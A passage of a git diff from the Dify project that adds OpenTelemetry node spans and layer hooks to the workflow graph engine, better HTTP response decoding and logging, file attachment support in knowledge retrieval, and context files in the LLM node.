+ + This layer: + - Creates a span when a node starts execution + - Establishes OTel context so automatic instrumentation associates with the span + - Sets complete attributes and status when node execution ends + """ + + def __init__(self) -> None: + super().__init__() + self._node_contexts: dict[str, _NodeSpanContext] = {} + self._parsers: dict[NodeType, NodeOTelParser] = {} + self._default_parser: NodeOTelParser = cast(NodeOTelParser, DefaultNodeOTelParser()) + self._is_disabled: bool = False + self._tracer: Tracer | None = None + self._build_parser_registry() + self._init_tracer() + + def _init_tracer(self) -> None: + """Initialize OpenTelemetry tracer in constructor.""" + if not (dify_config.ENABLE_OTEL or is_instrument_flag_enabled()): + self._is_disabled = True + return + + try: + self._tracer = get_tracer(__name__) + except Exception as e: + logger.warning("Failed to get OpenTelemetry tracer: %s", e) + self._is_disabled = True + + def _build_parser_registry(self) -> None: + """Initialize parser registry for node types.""" + self._parsers = { + NodeType.TOOL: ToolNodeOTelParser(), + } + + def _get_parser(self, node: Node) -> NodeOTelParser: + node_type = getattr(node, "node_type", None) + if isinstance(node_type, NodeType): + return self._parsers.get(node_type, self._default_parser) + return self._default_parser + + @override + def on_graph_start(self) -> None: + """Called when graph execution starts.""" + self._node_contexts.clear() + + @override + def on_node_run_start(self, node: Node) -> None: + """ + Called when a node starts execution. + + Creates a span and establishes OTel context for automatic instrumentation. + """ + if self._is_disabled: + return + + try: + if not self._tracer: + return + + execution_id = node.execution_id + if not execution_id: + return + + parent_context = context_api.get_current() + span = self._tracer.start_span( + f"{node.title}", + kind=SpanKind.INTERNAL, + context=parent_context, + ) + + new_context = set_span_in_context(span) + token = context_api.attach(new_context) + + self._node_contexts[execution_id] = _NodeSpanContext(span=span, token=token) + + except Exception as e: + logger.warning("Failed to create OpenTelemetry span for node %s: %s", node.id, e) + + @override + def on_node_run_end(self, node: Node, error: Exception | None) -> None: + """ + Called when a node finishes execution. + + Sets complete attributes, records exceptions, and ends the span. 
+ """ + if self._is_disabled: + return + + try: + execution_id = node.execution_id + if not execution_id: + return + node_context = self._node_contexts.get(execution_id) + if not node_context: + return + + span = node_context.span + parser = self._get_parser(node) + try: + parser.parse(node=node, span=span, error=error) + span.end() + finally: + token = node_context.token + if token is not None: + try: + context_api.detach(token) + except Exception: + logger.warning("Failed to detach OpenTelemetry token: %s", token) + self._node_contexts.pop(execution_id, None) + + except Exception as e: + logger.warning("Failed to end OpenTelemetry span for node %s: %s", node.id, e) + + @override + def on_event(self, event) -> None: + """Not used in this layer.""" + pass + + @override + def on_graph_end(self, error: Exception | None) -> None: + """Called when graph execution ends.""" + if self._node_contexts: + logger.warning( + "ObservabilityLayer: %d node spans were not properly ended", + len(self._node_contexts), + ) + self._node_contexts.clear() diff --git a/api/core/workflow/graph_engine/worker.py b/api/core/workflow/graph_engine/worker.py index 73e59ee298..e37a08ae47 100644 --- a/api/core/workflow/graph_engine/worker.py +++ b/api/core/workflow/graph_engine/worker.py @@ -9,6 +9,7 @@ import contextvars import queue import threading import time +from collections.abc import Sequence from datetime import datetime from typing import final from uuid import uuid4 @@ -17,6 +18,7 @@ from flask import Flask from typing_extensions import override from core.workflow.graph import Graph +from core.workflow.graph_engine.layers.base import GraphEngineLayer from core.workflow.graph_events import GraphNodeEventBase, NodeRunFailedEvent from core.workflow.nodes.base.node import Node from libs.flask_utils import preserve_flask_contexts @@ -39,6 +41,7 @@ class Worker(threading.Thread): ready_queue: ReadyQueue, event_queue: queue.Queue[GraphNodeEventBase], graph: Graph, + layers: Sequence[GraphEngineLayer], worker_id: int = 0, flask_app: Flask | None = None, context_vars: contextvars.Context | None = None, @@ -50,6 +53,7 @@ class Worker(threading.Thread): ready_queue: Ready queue containing node IDs ready for execution event_queue: Queue for pushing execution events graph: Graph containing nodes to execute + layers: Graph engine layers for node execution hooks worker_id: Unique identifier for this worker flask_app: Optional Flask application for context preservation context_vars: Optional context variables to preserve in worker thread @@ -63,6 +67,7 @@ class Worker(threading.Thread): self._context_vars = context_vars self._stop_event = threading.Event() self._last_task_time = time.time() + self._layers = layers if layers is not None else [] def stop(self) -> None: """Signal the worker to stop processing.""" @@ -122,20 +127,51 @@ class Worker(threading.Thread): Args: node: The node instance to execute """ - # Execute the node with preserved context if Flask app is provided + node.ensure_execution_id() + + error: Exception | None = None + if self._flask_app and self._context_vars: with preserve_flask_contexts( flask_app=self._flask_app, context_vars=self._context_vars, ): - # Execute the node + self._invoke_node_run_start_hooks(node) + try: + node_events = node.run() + for event in node_events: + self._event_queue.put(event) + except Exception as exc: + error = exc + raise + finally: + self._invoke_node_run_end_hooks(node, error) + else: + self._invoke_node_run_start_hooks(node) + try: node_events = node.run() for event in 
node_events: - # Forward event to dispatcher immediately for streaming self._event_queue.put(event) - else: - # Execute without context preservation - node_events = node.run() - for event in node_events: - # Forward event to dispatcher immediately for streaming - self._event_queue.put(event) + except Exception as exc: + error = exc + raise + finally: + self._invoke_node_run_end_hooks(node, error) + + def _invoke_node_run_start_hooks(self, node: Node) -> None: + """Invoke on_node_run_start hooks for all layers.""" + for layer in self._layers: + try: + layer.on_node_run_start(node) + except Exception: + # Silently ignore layer errors to prevent disrupting node execution + continue + + def _invoke_node_run_end_hooks(self, node: Node, error: Exception | None) -> None: + """Invoke on_node_run_end hooks for all layers.""" + for layer in self._layers: + try: + layer.on_node_run_end(node, error) + except Exception: + # Silently ignore layer errors to prevent disrupting node execution + continue diff --git a/api/core/workflow/graph_engine/worker_management/worker_pool.py b/api/core/workflow/graph_engine/worker_management/worker_pool.py index a9aada9ea5..5b9234586b 100644 --- a/api/core/workflow/graph_engine/worker_management/worker_pool.py +++ b/api/core/workflow/graph_engine/worker_management/worker_pool.py @@ -14,6 +14,7 @@ from configs import dify_config from core.workflow.graph import Graph from core.workflow.graph_events import GraphNodeEventBase +from ..layers.base import GraphEngineLayer from ..ready_queue import ReadyQueue from ..worker import Worker @@ -39,6 +40,7 @@ class WorkerPool: ready_queue: ReadyQueue, event_queue: queue.Queue[GraphNodeEventBase], graph: Graph, + layers: list[GraphEngineLayer], flask_app: "Flask | None" = None, context_vars: "Context | None" = None, min_workers: int | None = None, @@ -53,6 +55,7 @@ class WorkerPool: ready_queue: Ready queue for nodes ready for execution event_queue: Queue for worker events graph: The workflow graph + layers: Graph engine layers for node execution hooks flask_app: Optional Flask app for context preservation context_vars: Optional context variables min_workers: Minimum number of workers @@ -65,6 +68,7 @@ class WorkerPool: self._graph = graph self._flask_app = flask_app self._context_vars = context_vars + self._layers = layers # Scaling parameters with defaults self._min_workers = min_workers or dify_config.GRAPH_ENGINE_MIN_WORKERS @@ -144,6 +148,7 @@ class WorkerPool: ready_queue=self._ready_queue, event_queue=self._event_queue, graph=self._graph, + layers=self._layers, worker_id=worker_id, flask_app=self._flask_app, context_vars=self._context_vars, diff --git a/api/core/workflow/node_events/node.py b/api/core/workflow/node_events/node.py index ebf93f2fc2..e4fa52f444 100644 --- a/api/core/workflow/node_events/node.py +++ b/api/core/workflow/node_events/node.py @@ -3,6 +3,7 @@ from datetime import datetime from pydantic import Field +from core.file import File from core.model_runtime.entities.llm_entities import LLMUsage from core.rag.entities.citation_metadata import RetrievalSourceMetadata from core.workflow.entities.pause_reason import PauseReason @@ -14,6 +15,7 @@ from .base import NodeEventBase class RunRetrieverResourceEvent(NodeEventBase): retriever_resources: Sequence[RetrievalSourceMetadata] = Field(..., description="retriever resources") context: str = Field(..., description="context") + context_files: list[File] | None = Field(default=None, description="context files") class ModelInvokeCompletedEvent(NodeEventBase): diff 
--git a/api/core/workflow/nodes/base/entities.py b/api/core/workflow/nodes/base/entities.py index e816e16d74..5aab6bbde4 100644 --- a/api/core/workflow/nodes/base/entities.py +++ b/api/core/workflow/nodes/base/entities.py @@ -59,7 +59,7 @@ class OutputVariableEntity(BaseModel): """ variable: str - value_type: OutputVariableType + value_type: OutputVariableType = OutputVariableType.ANY value_selector: Sequence[str] @field_validator("value_type", mode="before") diff --git a/api/core/workflow/nodes/base/node.py b/api/core/workflow/nodes/base/node.py index c2e1105971..8ebba3659c 100644 --- a/api/core/workflow/nodes/base/node.py +++ b/api/core/workflow/nodes/base/node.py @@ -244,6 +244,15 @@ class Node(Generic[NodeDataT]): def graph_init_params(self) -> "GraphInitParams": return self._graph_init_params + @property + def execution_id(self) -> str: + return self._node_execution_id + + def ensure_execution_id(self) -> str: + if not self._node_execution_id: + self._node_execution_id = str(uuid4()) + return self._node_execution_id + def _hydrate_node_data(self, data: Mapping[str, Any]) -> NodeDataT: return cast(NodeDataT, self._node_data_type.model_validate(data)) @@ -256,14 +265,12 @@ class Node(Generic[NodeDataT]): raise NotImplementedError def run(self) -> Generator[GraphNodeEventBase, None, None]: - # Generate a single node execution ID to use for all events - if not self._node_execution_id: - self._node_execution_id = str(uuid4()) + execution_id = self.ensure_execution_id() self._start_at = naive_utc_now() # Create and push start event with required fields start_event = NodeRunStartedEvent( - id=self._node_execution_id, + id=execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.title, @@ -321,7 +328,7 @@ class Node(Generic[NodeDataT]): if isinstance(event, NodeEventBase): # pyright: ignore[reportUnnecessaryIsInstance] yield self._dispatch(event) elif isinstance(event, GraphNodeEventBase) and not event.in_iteration_id and not event.in_loop_id: # pyright: ignore[reportUnnecessaryIsInstance] - event.id = self._node_execution_id + event.id = self.execution_id yield event else: yield event @@ -333,7 +340,7 @@ class Node(Generic[NodeDataT]): error_type="WorkflowNodeError", ) yield NodeRunFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, start_at=self._start_at, @@ -512,7 +519,7 @@ class Node(Generic[NodeDataT]): match result.status: case WorkflowNodeExecutionStatus.FAILED: return NodeRunFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self.id, node_type=self.node_type, start_at=self._start_at, @@ -521,7 +528,7 @@ class Node(Generic[NodeDataT]): ) case WorkflowNodeExecutionStatus.SUCCEEDED: return NodeRunSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self.id, node_type=self.node_type, start_at=self._start_at, @@ -537,7 +544,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: StreamChunkEvent) -> NodeRunStreamChunkEvent: return NodeRunStreamChunkEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, selector=event.selector, @@ -550,7 +557,7 @@ class Node(Generic[NodeDataT]): match event.node_run_result.status: case WorkflowNodeExecutionStatus.SUCCEEDED: return NodeRunSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, start_at=self._start_at, @@ -558,7 +565,7 @@ class Node(Generic[NodeDataT]): ) case 
WorkflowNodeExecutionStatus.FAILED: return NodeRunFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, start_at=self._start_at, @@ -573,7 +580,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: PauseRequestedEvent) -> NodeRunPauseRequestedEvent: return NodeRunPauseRequestedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_run_result=NodeRunResult(status=WorkflowNodeExecutionStatus.PAUSED), @@ -583,7 +590,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: AgentLogEvent) -> NodeRunAgentLogEvent: return NodeRunAgentLogEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, message_id=event.message_id, @@ -599,7 +606,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopStartedEvent) -> NodeRunLoopStartedEvent: return NodeRunLoopStartedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -612,7 +619,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopNextEvent) -> NodeRunLoopNextEvent: return NodeRunLoopNextEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -623,7 +630,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopSucceededEvent) -> NodeRunLoopSucceededEvent: return NodeRunLoopSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -637,7 +644,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopFailedEvent) -> NodeRunLoopFailedEvent: return NodeRunLoopFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -652,7 +659,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationStartedEvent) -> NodeRunIterationStartedEvent: return NodeRunIterationStartedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -665,7 +672,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationNextEvent) -> NodeRunIterationNextEvent: return NodeRunIterationNextEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -676,7 +683,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationSucceededEvent) -> NodeRunIterationSucceededEvent: return NodeRunIterationSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -690,7 +697,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationFailedEvent) -> NodeRunIterationFailedEvent: return NodeRunIterationFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -705,7 +712,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: RunRetrieverResourceEvent) -> NodeRunRetrieverResourceEvent: return NodeRunRetrieverResourceEvent( - id=self._node_execution_id, + 
id=self.execution_id, node_id=self._node_id, node_type=self.node_type, retriever_resources=event.retriever_resources, diff --git a/api/core/workflow/nodes/http_request/entities.py b/api/core/workflow/nodes/http_request/entities.py index 5a7db6e0e6..e323533835 100644 --- a/api/core/workflow/nodes/http_request/entities.py +++ b/api/core/workflow/nodes/http_request/entities.py @@ -3,6 +3,7 @@ from collections.abc import Sequence from email.message import Message from typing import Any, Literal +import charset_normalizer import httpx from pydantic import BaseModel, Field, ValidationInfo, field_validator @@ -96,10 +97,12 @@ class HttpRequestNodeData(BaseNodeData): class Response: headers: dict[str, str] response: httpx.Response + _cached_text: str | None def __init__(self, response: httpx.Response): self.response = response self.headers = dict(response.headers) + self._cached_text = None @property def is_file(self): @@ -159,7 +162,31 @@ class Response: @property def text(self) -> str: - return self.response.text + """ + Get response text with robust encoding detection. + + Uses charset_normalizer for better encoding detection than httpx's default, + which helps handle Chinese and other non-ASCII characters properly. + """ + # Check cache first + if hasattr(self, "_cached_text") and self._cached_text is not None: + return self._cached_text + + # Try charset_normalizer for robust encoding detection first + detected_encoding = charset_normalizer.from_bytes(self.response.content).best() + if detected_encoding and detected_encoding.encoding: + try: + text = self.response.content.decode(detected_encoding.encoding) + self._cached_text = text + return text + except (UnicodeDecodeError, TypeError, LookupError): + # Fallback to httpx's encoding detection if charset_normalizer fails + pass + + # Fallback to httpx's built-in encoding detection + text = self.response.text + self._cached_text = text + return text @property def content(self) -> bytes: diff --git a/api/core/workflow/nodes/http_request/executor.py b/api/core/workflow/nodes/http_request/executor.py index 7b5b9c9e86..931c6113a7 100644 --- a/api/core/workflow/nodes/http_request/executor.py +++ b/api/core/workflow/nodes/http_request/executor.py @@ -86,6 +86,11 @@ class Executor: node_data.authorization.config.api_key = variable_pool.convert_template( node_data.authorization.config.api_key ).text + # Validate that API key is not empty after template conversion + if not node_data.authorization.config.api_key or not node_data.authorization.config.api_key.strip(): + raise AuthorizationConfigError( + "API key is required for authorization but was empty. Please provide a valid API key." + ) self.url = node_data.url self.method = node_data.method @@ -412,16 +417,20 @@ class Executor: body_string += f"--{boundary}\r\n" body_string += f'Content-Disposition: form-data; name="{key}"\r\n\r\n' # decode content safely - try: - body_string += content.decode("utf-8") - except UnicodeDecodeError: - body_string += content.decode("utf-8", errors="replace") - body_string += "\r\n" + # Do not decode binary content; use a placeholder with file metadata instead. + # Includes filename, size, and MIME type for better logging context. + body_string += ( + f"<binary data: filename={filename}, size={len(content)} bytes, mime_type={mime_type}>\r\n" + ) body_string += f"--{boundary}--\r\n" elif self.node_data.body: if self.content: + # If content is bytes, do not decode it; show a placeholder with size. + # Provides content size information for binary data without exposing the raw bytes.
if isinstance(self.content, bytes): - body_string = self.content.decode("utf-8", errors="replace") + body_string = f"<binary data: {len(self.content)} bytes>" else: body_string = self.content elif self.data and self.node_data.body.type == "x-www-form-urlencoded": diff --git a/api/core/workflow/nodes/knowledge_retrieval/entities.py b/api/core/workflow/nodes/knowledge_retrieval/entities.py index 8aa6a5016f..86bb2495e7 100644 --- a/api/core/workflow/nodes/knowledge_retrieval/entities.py +++ b/api/core/workflow/nodes/knowledge_retrieval/entities.py @@ -114,7 +114,8 @@ class KnowledgeRetrievalNodeData(BaseNodeData): """ type: str = "knowledge-retrieval" - query_variable_selector: list[str] + query_variable_selector: list[str] | None | str = None + query_attachment_selector: list[str] | None | str = None dataset_ids: list[str] retrieval_mode: Literal["single", "multiple"] multiple_retrieval_config: MultipleRetrievalConfig | None = None diff --git a/api/core/workflow/nodes/knowledge_retrieval/knowledge_retrieval_node.py b/api/core/workflow/nodes/knowledge_retrieval/knowledge_retrieval_node.py index 1b57d23e24..adc474bd60 100644 --- a/api/core/workflow/nodes/knowledge_retrieval/knowledge_retrieval_node.py +++ b/api/core/workflow/nodes/knowledge_retrieval/knowledge_retrieval_node.py @@ -25,6 +25,8 @@ from core.rag.entities.metadata_entities import Condition, MetadataCondition from core.rag.retrieval.dataset_retrieval import DatasetRetrieval from core.rag.retrieval.retrieval_methods import RetrievalMethod from core.variables import ( + ArrayFileSegment, + FileSegment, StringSegment, ) from core.variables.segments import ArrayObjectSegment @@ -119,20 +121,41 @@ class KnowledgeRetrievalNode(LLMUsageTrackingMixin, Node[KnowledgeRetrievalNodeD return "1" def _run(self) -> NodeRunResult: - # extract variables - variable = self.graph_runtime_state.variable_pool.get(self.node_data.query_variable_selector) - if not isinstance(variable, StringSegment): + if not self._node_data.query_variable_selector and not self._node_data.query_attachment_selector: return NodeRunResult( - status=WorkflowNodeExecutionStatus.FAILED, + status=WorkflowNodeExecutionStatus.SUCCEEDED, inputs={}, - error="Query variable is not string type.", - ) - query = variable.value - variables = {"query": query} - if not query: - return NodeRunResult( - status=WorkflowNodeExecutionStatus.FAILED, inputs=variables, error="Query is required." + process_data={}, + outputs={}, + metadata={}, + llm_usage=LLMUsage.empty_usage(), ) + variables: dict[str, Any] = {} + # extract variables + if self._node_data.query_variable_selector: + variable = self.graph_runtime_state.variable_pool.get(self._node_data.query_variable_selector) + if not isinstance(variable, StringSegment): + return NodeRunResult( + status=WorkflowNodeExecutionStatus.FAILED, + inputs={}, + error="Query variable is not string type.", + ) + query = variable.value + variables["query"] = query + + if self._node_data.query_attachment_selector: + variable = self.graph_runtime_state.variable_pool.get(self._node_data.query_attachment_selector) + if not isinstance(variable, ArrayFileSegment) and not isinstance(variable, FileSegment): + return NodeRunResult( + status=WorkflowNodeExecutionStatus.FAILED, + inputs={}, + error="Attachments variable is not array file or file type.", + ) + if isinstance(variable, ArrayFileSegment): + variables["attachments"] = variable.value + else: + variables["attachments"] = [variable.value] + # TODO(-LAN-): Move this check outside. 
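+ # `variables` carries the retrieval inputs resolved above: an optional "query" (str) and an optional + # "attachments" (list of File); _fetch_dataset_retriever consumes whichever keys are present.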
# check rate limit knowledge_rate_limit = FeatureService.get_knowledge_rate_limit(self.tenant_id) @@ -161,7 +184,7 @@ class KnowledgeRetrievalNode(LLMUsageTrackingMixin, Node[KnowledgeRetrievalNodeD # retrieve knowledge usage = LLMUsage.empty_usage() try: - results, usage = self._fetch_dataset_retriever(node_data=self.node_data, query=query) + results, usage = self._fetch_dataset_retriever(node_data=self._node_data, variables=variables) outputs = {"result": ArrayObjectSegment(value=results)} return NodeRunResult( status=WorkflowNodeExecutionStatus.SUCCEEDED, @@ -198,12 +221,16 @@ class KnowledgeRetrievalNode(LLMUsageTrackingMixin, Node[KnowledgeRetrievalNodeD db.session.close() def _fetch_dataset_retriever( - self, node_data: KnowledgeRetrievalNodeData, query: str + self, node_data: KnowledgeRetrievalNodeData, variables: dict[str, Any] ) -> tuple[list[dict[str, Any]], LLMUsage]: usage = LLMUsage.empty_usage() available_datasets = [] dataset_ids = node_data.dataset_ids - + query = variables.get("query") + attachments = variables.get("attachments") + metadata_filter_document_ids = None + metadata_condition = None + metadata_usage = LLMUsage.empty_usage() # Subquery: Count the number of available documents for each dataset subquery = ( db.session.query(Document.dataset_id, func.count(Document.id).label("available_document_count")) @@ -234,13 +261,14 @@ class KnowledgeRetrievalNode(LLMUsageTrackingMixin, Node[KnowledgeRetrievalNodeD if not dataset: continue available_datasets.append(dataset) - metadata_filter_document_ids, metadata_condition, metadata_usage = self._get_metadata_filter_condition( - [dataset.id for dataset in available_datasets], query, node_data - ) - usage = self._merge_usage(usage, metadata_usage) + if query: + metadata_filter_document_ids, metadata_condition, metadata_usage = self._get_metadata_filter_condition( + [dataset.id for dataset in available_datasets], query, node_data + ) + usage = self._merge_usage(usage, metadata_usage) all_documents = [] dataset_retrieval = DatasetRetrieval() - if node_data.retrieval_mode == DatasetRetrieveConfigEntity.RetrieveStrategy.SINGLE: + if str(node_data.retrieval_mode) == DatasetRetrieveConfigEntity.RetrieveStrategy.SINGLE and query: # fetch model config if node_data.single_retrieval_config is None: raise ValueError("single_retrieval_config is required") @@ -272,7 +300,7 @@ class KnowledgeRetrievalNode(LLMUsageTrackingMixin, Node[KnowledgeRetrievalNodeD metadata_filter_document_ids=metadata_filter_document_ids, metadata_condition=metadata_condition, ) - elif node_data.retrieval_mode == DatasetRetrieveConfigEntity.RetrieveStrategy.MULTIPLE: + elif str(node_data.retrieval_mode) == DatasetRetrieveConfigEntity.RetrieveStrategy.MULTIPLE: if node_data.multiple_retrieval_config is None: raise ValueError("multiple_retrieval_config is required") if node_data.multiple_retrieval_config.reranking_mode == "reranking_model": @@ -319,6 +347,7 @@ class KnowledgeRetrievalNode(LLMUsageTrackingMixin, Node[KnowledgeRetrievalNodeD reranking_enable=node_data.multiple_retrieval_config.reranking_enable, metadata_filter_document_ids=metadata_filter_document_ids, metadata_condition=metadata_condition, + attachment_ids=[attachment.related_id for attachment in attachments] if attachments else None, ) usage = self._merge_usage(usage, dataset_retrieval.llm_usage) @@ -327,7 +356,7 @@ class KnowledgeRetrievalNode(LLMUsageTrackingMixin, Node[KnowledgeRetrievalNodeD retrieval_resource_list = [] # deal with external documents for item in external_documents: - source = { 
+ source: dict[str, dict[str, str | Any | dict[Any, Any] | None] | Any | str | None] = { "metadata": { "_source": "knowledge", "dataset_id": item.metadata.get("dataset_id"), @@ -384,6 +413,7 @@ class KnowledgeRetrievalNode(LLMUsageTrackingMixin, Node[KnowledgeRetrievalNodeD "doc_metadata": document.doc_metadata, }, "title": document.name, + "files": list(record.files) if record.files else None, } if segment.answer: source["content"] = f"question:{segment.get_sign_content()} \nanswer:{segment.answer}" @@ -393,13 +423,21 @@ class KnowledgeRetrievalNode(LLMUsageTrackingMixin, Node[KnowledgeRetrievalNodeD if retrieval_resource_list: retrieval_resource_list = sorted( retrieval_resource_list, - key=lambda x: x["metadata"]["score"] if x["metadata"].get("score") is not None else 0.0, + key=self._score, # type: ignore[arg-type, return-value] reverse=True, ) for position, item in enumerate(retrieval_resource_list, start=1): - item["metadata"]["position"] = position + item["metadata"]["position"] = position # type: ignore[index] return retrieval_resource_list, usage + def _score(self, item: dict[str, Any]) -> float: + meta = item.get("metadata") + if isinstance(meta, dict): + s = meta.get("score") + if isinstance(s, (int, float)): + return float(s) + return 0.0 + def _get_metadata_filter_condition( self, dataset_ids: list, query: str, node_data: KnowledgeRetrievalNodeData ) -> tuple[dict[str, list[str]] | None, MetadataCondition | None, LLMUsage]: @@ -659,7 +697,10 @@ class KnowledgeRetrievalNode(LLMUsageTrackingMixin, Node[KnowledgeRetrievalNodeD typed_node_data = KnowledgeRetrievalNodeData.model_validate(node_data) variable_mapping = {} - variable_mapping[node_id + ".query"] = typed_node_data.query_variable_selector + if typed_node_data.query_variable_selector: + variable_mapping[node_id + ".query"] = typed_node_data.query_variable_selector + if typed_node_data.query_attachment_selector: + variable_mapping[node_id + ".queryAttachment"] = typed_node_data.query_attachment_selector return variable_mapping def get_model_config(self, model: ModelConfig) -> tuple[ModelInstance, ModelConfigWithCredentialsEntity]: diff --git a/api/core/workflow/nodes/llm/node.py b/api/core/workflow/nodes/llm/node.py index 1a2473e0bb..04e2802191 100644 --- a/api/core/workflow/nodes/llm/node.py +++ b/api/core/workflow/nodes/llm/node.py @@ -7,8 +7,10 @@ import time from collections.abc import Generator, Mapping, Sequence from typing import TYPE_CHECKING, Any, Literal +from sqlalchemy import select + from core.app.entities.app_invoke_entities import ModelConfigWithCredentialsEntity -from core.file import FileType, file_manager +from core.file import File, FileTransferMethod, FileType, file_manager from core.helper.code_executor import CodeExecutor, CodeLanguage from core.llm_generator.output_parser.errors import OutputParserError from core.llm_generator.output_parser.structured_output import invoke_llm_with_structured_output @@ -44,6 +46,7 @@ from core.model_runtime.utils.encoders import jsonable_encoder from core.prompt.entities.advanced_prompt_entities import CompletionModelPromptTemplate, MemoryConfig from core.prompt.utils.prompt_message_util import PromptMessageUtil from core.rag.entities.citation_metadata import RetrievalSourceMetadata +from core.tools.signature import sign_upload_file from core.variables import ( ArrayFileSegment, ArraySegment, @@ -72,6 +75,9 @@ from core.workflow.nodes.base.entities import VariableSelector from core.workflow.nodes.base.node import Node from 
core.workflow.nodes.base.variable_template_parser import VariableTemplateParser from core.workflow.runtime import VariablePool +from extensions.ext_database import db +from models.dataset import SegmentAttachmentBinding +from models.model import UploadFile from . import llm_utils from .entities import ( @@ -179,12 +185,17 @@ class LLMNode(Node[LLMNodeData]): # fetch context value generator = self._fetch_context(node_data=self.node_data) context = None + context_files: list[File] = [] for event in generator: context = event.context + context_files = event.context_files or [] yield event if context: node_inputs["#context#"] = context + if context_files: + node_inputs["#context_files#"] = [file.model_dump() for file in context_files] + # fetch model config model_instance, model_config = LLMNode._fetch_model_config( node_data_model=self.node_data.model, @@ -220,6 +231,7 @@ class LLMNode(Node[LLMNodeData]): variable_pool=variable_pool, jinja2_variables=self.node_data.prompt_config.jinja2_variables, tenant_id=self.tenant_id, + context_files=context_files, ) # handle invoke result @@ -322,6 +334,7 @@ class LLMNode(Node[LLMNodeData]): inputs=node_inputs, process_data=process_data, error_type=type(e).__name__, + llm_usage=usage, ) ) except Exception as e: @@ -332,6 +345,8 @@ class LLMNode(Node[LLMNodeData]): error=str(e), inputs=node_inputs, process_data=process_data, + error_type=type(e).__name__, + llm_usage=usage, ) ) @@ -654,10 +669,13 @@ class LLMNode(Node[LLMNodeData]): context_value_variable = self.graph_runtime_state.variable_pool.get(node_data.context.variable_selector) if context_value_variable: if isinstance(context_value_variable, StringSegment): - yield RunRetrieverResourceEvent(retriever_resources=[], context=context_value_variable.value) + yield RunRetrieverResourceEvent( + retriever_resources=[], context=context_value_variable.value, context_files=[] + ) elif isinstance(context_value_variable, ArraySegment): context_str = "" original_retriever_resource: list[RetrievalSourceMetadata] = [] + context_files: list[File] = [] for item in context_value_variable.value: if isinstance(item, str): context_str += item + "\n" @@ -670,9 +688,34 @@ class LLMNode(Node[LLMNodeData]): retriever_resource = self._convert_to_original_retriever_resource(item) if retriever_resource: original_retriever_resource.append(retriever_resource) - + attachments_with_bindings = db.session.execute( + select(SegmentAttachmentBinding, UploadFile) + .join(UploadFile, UploadFile.id == SegmentAttachmentBinding.attachment_id) + .where( + SegmentAttachmentBinding.segment_id == retriever_resource.segment_id, + ) + ).all() + if attachments_with_bindings: + for _, upload_file in attachments_with_bindings: + attachment_info = File( + id=upload_file.id, + filename=upload_file.name, + extension="." 
+ upload_file.extension, + mime_type=upload_file.mime_type, + tenant_id=self.tenant_id, + type=FileType.IMAGE, + transfer_method=FileTransferMethod.LOCAL_FILE, + remote_url=upload_file.source_url, + related_id=upload_file.id, + size=upload_file.size, + storage_key=upload_file.key, + url=sign_upload_file(upload_file.id, upload_file.extension), + ) + context_files.append(attachment_info) yield RunRetrieverResourceEvent( - retriever_resources=original_retriever_resource, context=context_str.strip() + retriever_resources=original_retriever_resource, + context=context_str.strip(), + context_files=context_files, ) def _convert_to_original_retriever_resource(self, context_dict: dict) -> RetrievalSourceMetadata | None: @@ -700,6 +743,7 @@ class LLMNode(Node[LLMNodeData]): content=context_dict.get("content"), page=metadata.get("page"), doc_metadata=metadata.get("doc_metadata"), + files=context_dict.get("files"), ) return source @@ -741,6 +785,7 @@ class LLMNode(Node[LLMNodeData]): variable_pool: VariablePool, jinja2_variables: Sequence[VariableSelector], tenant_id: str, + context_files: list["File"] | None = None, ) -> tuple[Sequence[PromptMessage], Sequence[str] | None]: prompt_messages: list[PromptMessage] = [] @@ -853,6 +898,23 @@ class LLMNode(Node[LLMNodeData]): else: prompt_messages.append(UserPromptMessage(content=file_prompts)) + # The context_files + if vision_enabled and context_files: + file_prompts = [] + for file in context_files: + file_prompt = file_manager.to_prompt_message_content(file, image_detail_config=vision_detail) + file_prompts.append(file_prompt) + # If last prompt is a user prompt, add files into its contents, + # otherwise append a new user prompt + if ( + len(prompt_messages) > 0 + and isinstance(prompt_messages[-1], UserPromptMessage) + and isinstance(prompt_messages[-1].content, list) + ): + prompt_messages[-1] = UserPromptMessage(content=file_prompts + 